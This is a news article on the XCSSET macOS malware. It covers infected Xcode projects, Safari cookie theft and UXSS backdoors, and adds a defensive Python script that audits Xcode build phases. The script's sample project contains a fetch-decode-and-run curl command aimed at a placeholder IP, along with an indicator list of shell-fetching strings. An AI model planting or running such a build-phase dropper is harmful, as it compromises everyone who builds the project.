Researchers at Trend Micro have discovered a new macOS malware called XCSSET, which spreads through an unusual channel: it is injected into the Xcode projects of several macOS developers, who then unknowingly pass it on to anyone who builds from those projects. Once running, it steals data with the help of two zero-day bugs.

New macOS Malware Spread through Xcode!

As Trend Micro reported, unknown attackers are injecting the malware into the Xcode projects of Apple developers. Xcode is Apple's integrated development environment (IDE), used to build apps for macOS, iOS and Apple's other platforms.

It is not yet known how the malware gets into developers' Xcode projects, but the researchers describe the result as a supply-chain attack: several of the affected developers host their projects on GitHub, so anyone who clones an infected project and builds from it compiles the malware into their own work and passes it on in turn.
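The article does not say where in a project the payload hooks in. One place that runs arbitrary commands every time a project is built is a Run Script build phase, stored as a PBXShellScriptBuildPhase object in project.pbxproj, so a practical pre-build check for a cloned project is to list those phases and flag fetch-and-execute patterns. The following is an added example written for this page, not code from the article, from Trend Micro or from XCSSET itself; the indicator strings, the sample project file and the assumption that the hook is a build phase are all the example's own.

```python
import re
from typing import Dict, List

# Strings a linter or code-generation phase rarely needs but a dropper that
# fetches, decodes and launches a payload during the build typically does.
# These are triage heuristics chosen for this example, not an XCSSET signature.
INDICATORS = (
    "curl ", "wget ", "base64 -", "eval ", "osascript", "nohup ",
    "python -c", "| sh", "| bash", "xattr -d", "chmod +x",
)

# project.pbxproj is an old-style (NeXTSTEP) plist, which plistlib cannot read,
# so objects are located by pattern matching. A quoted string is consumed whole
# so that a "};" inside a script body does not end the object early.
_STR = r'"(?:[^"\\]|\\.)*"'
_PHASE_RE = re.compile(
    r'(?P<id>[0-9A-F]{24})[^\n{]*\{'
    r'(?P<body>(?:' + _STR + r'|(?!\};)[^"])*?isa = PBXShellScriptBuildPhase;'
    r'(?:' + _STR + r'|(?!\};)[^"])*)\};'
)
_SCRIPT_RE = re.compile(r'shellScript = (' + _STR + r');')
_NAME_RE = re.compile(r'\bname = "?([^";\n]+?)"?;')


def _unescape(quoted: str) -> str:
    """Strip the surrounding quotes and resolve the backslash escapes pbxproj uses."""
    inner = quoted[1:-1]
    return re.sub(r'\\(.)', lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), inner)


def audit_pbxproj(text: str) -> List[Dict[str, object]]:
    """Return every shell-script build phase in a pbxproj with the indicators it matched."""
    findings = []
    for m in _PHASE_RE.finditer(text):
        body = m.group("body")
        sm = _SCRIPT_RE.search(body)
        script = _unescape(sm.group(1)) if sm else ""
        nm = _NAME_RE.search(body)
        hits = [tok for tok in INDICATORS if tok in script]
        findings.append({
            "id": m.group("id"),
            "name": nm.group(1) if nm else "(unnamed)",
            "script": script,
            "indicators": hits,
            "suspicious": bool(hits),
        })
    return findings


# Constructed sample project.pbxproj (not taken from any real project): one
# benign linter phase and one phase that fetches and executes a remote payload.
SAMPLE_PBXPROJ = r'''// !$*UTF8*$!
{
    objects = {
        1F2E3D4C5B6A79880F1E2D01 /* Sources */ = {
            isa = PBXSourcesBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            runOnlyForDeploymentPostprocessing = 0;
        };
        1F2E3D4C5B6A79880F1E2D02 /* SwiftLint */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            name = SwiftLint;
            runOnlyForDeploymentPostprocessing = 0;
            shellPath = /bin/sh;
            shellScript = "if which swiftlint >/dev/null; then swiftlint; fi\n";
        };
        1F2E3D4C5B6A79880F1E2D03 /* ShellScript */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            runOnlyForDeploymentPostprocessing = 0;
            shellPath = /bin/sh;
            shellScript = "curl -s \"http://203.0.113.5/p.txt\" | base64 --decode | sh\n";
        };
    };
}
'''

if __name__ == "__main__":
    for f in audit_pbxproj(SAMPLE_PBXPROJ):
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f'{f["id"]} {f["name"]}: {flag} {f["indicators"]}')
```

Run it against `MyApp.xcodeproj/project.pbxproj` of any project you did not write before pressing Build; a flagged phase deserves a read of its full script, and an unnamed phase that was not in the upstream repository's history deserves one even more. The check is deliberately narrow: it does not look at .xcassets, .xcconfig or other files where build-time code can also hide.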

The distribution method is ingenious, but what makes the malware serious is that it exploits two zero-day bugs in Safari and WebKit. The first concerns Safari's cookie files, which macOS protects with a Data Vault; the malware bypasses that protection by reading the files through SSH, since the SSH daemon (sshd) is not subject to the same restriction.

The second bug lies in how the development version of Safari, used for testing WebKit, operates: launching it normally asks for the user's password, but the bug lets the malware skip that step and carry out its malicious operations in an unsandboxed Safari.

Together, these two bugs let the malware read and dump Safari's cookies and, by means of a Universal Cross-Site Scripting (UXSS) attack, inject JavaScript-based backdoors into the pages Safari displays.

The researchers also found that it steals user data from the chat apps Skype, Telegram, QQ and WeChat, and from Notes and Evernote. It can further modify browser sessions to display malicious websites, harvest credit card data from the Apple Store, replace cryptocurrency wallet addresses, and steal credentials for Apple ID, Google, PayPal and Yandex accounts.
